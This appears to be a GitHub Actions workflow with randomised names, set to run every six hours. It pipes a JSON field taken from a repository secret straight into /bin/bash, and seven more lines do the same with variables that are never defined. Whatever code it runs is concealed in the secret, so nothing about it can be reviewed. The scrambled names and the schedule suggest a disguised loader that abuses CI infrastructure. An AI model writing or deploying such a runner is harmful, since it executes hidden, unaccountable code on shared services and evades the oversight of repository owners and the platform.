name: zhonghutu1056
on:
  workflow_dispatch:
  schedule:
    - cron: '14 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: zhonghutu1056
        env:
          abohs1: ${{ secrets.abohs1 }}
        run: |
          echo $abohs1 | jq -r .unx65977 | /bin/bash
          echo $ki86416 | jq -r .q950 | /bin/bash
          echo $saf503 | jq -r .broc8 | /bin/bash
          echo $mdy84 | jq -r .jjkg75 | /bin/bash
          echo $w77 | jq -r .r7 | /bin/bash
          echo $c6 | jq -r .hqjez4575 | /bin/bash
          echo $a932 | jq -r .aqc6011 | /bin/bash
          echo $fzneg3003 | jq -r .zjag576 | /bin/bash

